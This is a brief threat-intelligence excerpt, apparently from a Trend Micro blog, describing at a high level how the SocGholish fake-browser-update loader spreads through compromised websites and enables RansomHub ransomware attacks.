SocGholish’s Intrusion Techniques Facilitate Distribution of RansomHub Ransomware www.trendmicro.com/en_us/res…

First observed in 2018, Trend Research has been closely monitoring the activities of the SocGholish – also known as FakeUpdates – malware-as-a-service (MaaS) framework. This particular intrusion set is tracked by Trend Micro under the name Water Scylla, whose activities lead to RansomHub ransomware deployment.

SocGholish is characterised by its highly obfuscated JavaScript loader, which employs a range of evasion techniques that enable it to bypass traditional signature-based detection methods effectively.

The primary method of propagation for SocGholish involves the compromise of legitimate websites. Threat actors inject malicious scripts into these sites to hijack user traffic. When users visit these compromised sites, they are redirected to deceptive webpages that masquerade as legitimate browser update notifications. Through social engineering tactics, users are convinced to download a malicious ZIP file. This file contains a JavaScript file, which is the SocGholish loader.

This blog entry focuses on a cluster that deploys backdoor components to enable initial access for RansomHub ransomware-as-a-service (RaaS) affiliates. Ransomhub is a top ransomware player in terms of the number of organisations impacted by data breaches, just behind Akira in second place and CL0P in first, and SocGholish a key enabler of these attacks.